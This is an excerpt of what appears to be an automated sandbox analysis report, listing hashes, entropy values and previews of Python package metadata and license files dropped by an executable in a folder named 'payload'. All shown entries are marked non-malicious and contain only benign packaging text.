                                                                                                                                                                                                                                            MD5:1A287FAF08B125BC7C932AAD05E7DAEE
                                                                                                                                                                                                                                            SHA1:C37042ADC0D1270485F4B8B5B9E085A274DC035B
                                                                                                                                                                                                                                            SHA-256:66030D634580651B3E53CC19895D9231F8D22AA06B327817C8332CFC20303308
                                                                                                                                                                                                                                            SHA-512:D0BB0AD27A17007DF7D3281FB2F46EFB048B69532D082AB1D431E0BA28E592D897687708B4EC972F4BC21EDA29DDDDC9EF44BB950DFC4FFB03EA75CDA4DE414C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: inflect.Version: 7.3.1.Summary: Correctly generate plurals, singular nouns, ordinals, indefinite articles.Author-email: Paul Dyson <pwdyson@yahoo.com>.Maintainer-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/jaraco/inflect.Keywords: plural,inflect,participle.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Natural Language :: English.Classifier: Operating System :: OS Independent.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic :: Text Processing :: Linguistic.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: more-itertools >=8.5.0.Requires-Dist: typeguard >=4.0.1.Requires-Dist: typing-extensions ; python_version < "3.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):943
                                                                                                                                                                                                                                            Entropy (8bit):5.828988691860191
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:IVn/2zDPvbqfuIpBntmuIcjlM+sVGXdbkDcnJopDvDK16bZWJV:unuXPzUuIpRtmuZjl9sVQgcnJo9bK16E
                                                                                                                                                                                                                                            MD5:C837BB3258448B7FCC6B77559C7F17B6
                                                                                                                                                                                                                                            SHA1:B15701449CD64A13756A70AD3704E26DB1FF416B
                                                                                                                                                                                                                                            SHA-256:5D7834AC1BA2612C6801050FDE57A7B98B0F36ACF88C3C2D4F376FD8911B3091
                                                                                                                                                                                                                                            SHA-512:2333CD86502C51607414390ECF43BD6D62E863D3DFB0501DAD3A8B45F5F4DFA81F910917183FC4F4A0DEEC82C8F8B3CF8D5B0A2C136DEB164226BABE68B74A33
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:inflect-7.3.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..inflect-7.3.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..inflect-7.3.1.dist-info/METADATA,sha256=ZgMNY0WAZRs-U8wZiV2SMfjSKqBrMngXyDMs_CAwMwg,21079..inflect-7.3.1.dist-info/RECORD,,..inflect-7.3.1.dist-info/WHEEL,sha256=y4mX-SOX4fYIkonsAGA5N0Oy-8_gI4FXw5HNI1xqvWg,91..inflect-7.3.1.dist-info/top_level.txt,sha256=m52ujdp10CqT6jh1XQxZT6kEntcnv-7Tl7UiGNTzWZA,8..inflect/__init__.py,sha256=Jxy1HJXZiZ85kHeLAhkmvz6EMTdFqBe-duvt34R6IOc,103796..inflect/__pycache__/__init__.cpython-312.pyc,,..inflect/compat/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..inflect/compat/__pycache__/__init__.cpython-312.pyc,,..inflect/compat/__pycache__/py38.cpython-312.pyc,,..inflect/compat/py38.py,sha256=oObVfVnWX9_OpnOuEJn1mFbJxVhwyR5epbiTNXDDaso,160..inflect/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):91
                                                                                                                                                                                                                                            Entropy (8bit):4.7098485981676825
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeXMRYFAVLKSgP+tPCCfA5S:RtC1VLKZWBBf
                                                                                                                                                                                                                                            MD5:EB46A94D39AC40E2EEA4A32729E0C8C3
                                                                                                                                                                                                                                            SHA1:E42EF49A7098269E1934932ECC3174B40967982A
                                                                                                                                                                                                                                            SHA-256:CB8997F92397E1F6089289EC0060393743B2FBCFE0238157C391CD235C6ABD68
                                                                                                                                                                                                                                            SHA-512:D89F0DA16AA37AAFAC0DE56A3DFBD72DC3C9DCC53C8E455094E7230DB21ABF95ED76EAC1848A4156DB422B9C10BE136201D871DCCB73AD38192E5536E41DBDFE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: setuptools (70.2.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8
                                                                                                                                                                                                                                            Entropy (8bit):3.0
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:KDpJ:K9J
                                                                                                                                                                                                                                            MD5:4571281D24750CBE7638EFE250E342AB
                                                                                                                                                                                                                                            SHA1:61E8A0AD5796F1CA67EAB0D8108A6402483D499B
                                                                                                                                                                                                                                            SHA-256:9B9DAE8DDA75D02A93EA38755D0C594FA9049ED727BFEED397B52218D4F35990
                                                                                                                                                                                                                                            SHA-512:E7807002E53CC228D6EFB307E928C6737796B29E31D25A342ED407F556FFBF540494FE92C27B5C31043D2D7FF427C78A29C4FF5595BC11BB643003026642254E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:inflect.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3933
                                                                                                                                                                                                                                            Entropy (8bit):4.993707893382395
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:D0duaC9zmnEh2S8xI0+4np+A+fbl7inVgQJSwT2:qq9KnEh2zxI0+4npn+zlmn+QJSwT2
                                                                                                                                                                                                                                            MD5:C9BA49C9B82CEFCCAC79CB5B76BCB1EE
                                                                                                                                                                                                                                            SHA1:AC0DB25AEFD2679B4C3265E713D00F6155A94465
                                                                                                                                                                                                                                            SHA-256:20C51A96236C0395F53B1F4C5D458E6A0721E51E16C1BFF733B7ABA76F5D06D8
                                                                                                                                                                                                                                            SHA-512:563C3BEC6FB8D137357130BADCB63A229A18A781B05E2F006F4A42AF7C9052D23D266908DA2E62FF283C9BA7BAA9B6CB6FB32A1999CB07F63471CA43003A34C0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: jaraco.collections.Version: 5.1.0.Summary: Collection objects similar to those in stdlib by jaraco.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/jaraco/jaraco.collections.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: jaraco.text.Provides-Extra: check.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'check'.Requires-Dist: pytest-ruff >=0.2.1 ; (sys_platform != "cygwin") and extra == 'check'.Provides-Extra: cover.Requires-Dist: pytest-cov ; extra == 'cover'.Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):873
                                                                                                                                                                                                                                            Entropy (8bit):5.770829319764291
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:T9bn/2zDabvbqfunb1AO5bGYbEsJvbp1blKzmKmJaaX9WJV:T9bnuXabzUunb1AgbBb5Jvbp1blscWJV
                                                                                                                                                                                                                                            MD5:0463062305AC30E7F3D6AB12DA825D90
                                                                                                                                                                                                                                            SHA1:AC83602461BF535C78EB4CCC13AB103C12110D57
                                                                                                                                                                                                                                            SHA-256:1E9B62BD70E4A5FA26E9594CBB80860FFECA3DEBFEE8773DAEFA774CD259CA06
                                                                                                                                                                                                                                            SHA-512:8F617D9A2DA41BDC8591D9EA9F2DBE79D7C5816BA7A94D4044AFF2A0504C9738E83FFCAA350CEF20764D430C261C9DC17DBB5E4ABB7AE54C3BE8715C8AD6BB71
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.collections-5.1.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.collections-5.1.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.collections-5.1.0.dist-info/METADATA,sha256=IMUaliNsA5X1Ox9MXUWOagch5R4Wwb_3M7erp29dBtg,3933..jaraco.collections-5.1.0.dist-info/RECORD,,..jaraco.collections-5.1.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..jaraco.collections-5.1.0.dist-info/WHEEL,sha256=Mdi9PDNwEZptOjTlUcAth7XJDFtKrHYaQMPulZeBCiQ,91..jaraco.collections-5.1.0.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/collections/__init__.py,sha256=Pc1-SqjWm81ad1P0-GttpkwO_LWlnaY6gUq8gcKh2v0,26640..jaraco/collections/__pycache__/__init__.cpython-312.pyc,,..jaraco/collections/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):91
                                                                                                                                                                                                                                            Entropy (8bit):4.696166043246402
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeXMRYFAWWHKRRP+tPCCfA5S:RtC1qjWBBf
                                                                                                                                                                                                                                            MD5:6FBE8610D7E48CA32AE774804C4A0B19
                                                                                                                                                                                                                                            SHA1:102D23C4ECB17ED83A6E43888B45FF2BBFE93E0B
                                                                                                                                                                                                                                            SHA-256:31D8BD3C3370119A6D3A34E551C02D87B5C90C5B4AAC761A40C3EE9597810A24
                                                                                                                                                                                                                                            SHA-512:78738099EC5B31FDEE5AE50F7840F17EFD526588835157CADF4249882462B1AF2E3BEDB77801A9FCB1D22A8FD41AA6A934B382F3E66309723D0E7F93C2F2868A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: setuptools (73.0.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7
                                                                                                                                                                                                                                            Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                                            MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                                            SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                                            SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                                            SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (406)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4020
                                                                                                                                                                                                                                            Entropy (8bit):4.99859161164956
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:D6P4YaCP1gGRbHneRohWYc+f/PCnG9rulJQ84UNxCUSwTcL:kPqGRbHneRohWJ+XPaqylW/USwTcL
                                                                                                                                                                                                                                            MD5:812F27A7C8C748351DC1643D58B6B250
                                                                                                                                                                                                                                            SHA1:AC9C92013B2F0FC65D741B32A9FE4B956DD6EB7D
                                                                                                                                                                                                                                            SHA-256:C43B60B897A3D2D37D8845C252FC44261D9AEF171E21154111A9012D2AFFFED6
                                                                                                                                                                                                                                            SHA-512:CAC62C3682F808D85233B69F1C142B5A0E95E316E4BDCBC6EE253583EC302FA42E635BAB6A837327D8CE5D26C08C8DCD9E45D5CFDD8346B4501C473250D66953
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: jaraco.context.Version: 5.3.0.Summary: Useful decorators and context managers.Home-page: https://github.com/jaraco/jaraco.context.Author: Jason R. Coombs.Author-email: jaraco@jaraco.com.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: backports.tarfile ; python_version < "3.12".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest !=8.1.1,>=6 ; extra == 'testing'.Requires-Dist: pytest-checkdocs >=2.4
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):641
                                                                                                                                                                                                                                            Entropy (8bit):5.76835538630355
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:TGA0a/2zDJAv/TnqfQlWJAL/fy9vKAGvAXCaaryBAl2VrkEQCXvbAT2r1S:TBn/2zDCvbqfuLO9FGoXamalKSCXzB1S
                                                                                                                                                                                                                                            MD5:2B0A77624AE3903E42C3A8213E593796
                                                                                                                                                                                                                                            SHA1:D63027FF018995D0620E2497BCE9678888A57667
                                                                                                                                                                                                                                            SHA-256:55197B88A78443297BB2D827A75BAAE740B33896251D872835D4B4C75EC2F57E
                                                                                                                                                                                                                                            SHA-512:C02FB1554F8F40158BB60F2B4EC07D80F71CFBFFB38463C5809385A7A2FF8DDB2BDFEFE9AE5E67F4DEC3D904A6E0925E565B0EE6363DD0C2ED5B03A96B056B18
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.context-5.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.context-5.3.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.context-5.3.0.dist-info/METADATA,sha256=xDtguJej0tN9iEXCUvxEJh2a7xceIRVBEakBLSr__tY,4020..jaraco.context-5.3.0.dist-info/RECORD,,..jaraco.context-5.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.context-5.3.0.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/__pycache__/context.cpython-312.pyc,,..jaraco/context.py,sha256=REoLIxDkO5MfEYowt_WoupNCRoxBS5v7YX2PbW8lIcs,9552..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7
                                                                                                                                                                                                                                            Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                                            MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                                            SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                                            SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                                            SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2891
                                                                                                                                                                                                                                            Entropy (8bit):5.034580807599395
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:DEmbsaC3J1x9Ie9okNGwQw8wQw2wTw0zCPU0+I65Jib0H++kv0gM5d0DT+heU04u:DEmgaCZ1nTGDbHRAnzpI6o+fX5dFSwTm
                                                                                                                                                                                                                                            MD5:C2E6BDA7F1B03B39BF42D31B6DBF6C38
                                                                                                                                                                                                                                            SHA1:B7A18F079DE22D10C4C318E54BD8C48177F91333
